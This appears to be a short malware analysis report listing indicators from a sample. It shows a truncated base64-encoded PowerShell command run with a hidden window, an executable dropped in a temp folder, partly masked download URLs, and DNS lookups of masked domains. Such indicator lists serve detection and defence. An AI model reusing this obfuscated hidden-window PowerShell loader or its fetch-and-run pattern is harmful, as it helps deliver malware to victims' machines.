Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADUAcgB0AHoAegBnAD0AKAAnAFYAJwArACgAJwBnAGYAJwArACcAOQAnACkAKwAoACcAZQAnACsAJwBtADcAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\buccmi.exe
- %TEMP%\word\2019\buccmi.exe
- http://te####ojikibris.com/wp-content/Q/
- http://ne#####nterprises.com/wp-admin/4IZ/
- DNS ASK te####ojikibris.com
- DNS ASK ne#####nterprises.com
- DNS ASK th####ilityhub.com
- DNS ASK ka####culture.com
- DNS ASK di####lkarar.com
- DNS ASK vi###kimbo.com
- DNS ASK ge####dtsauto.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADUAcgB0AHoAegBnAD0AKAAnAFYAJwArACgAJwBnAGYAJwArACcAOQAnACkAKwAoACcAZQAnACsAJwBtADcAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AUgBEAFwAMgAwAD...' (with hidden window)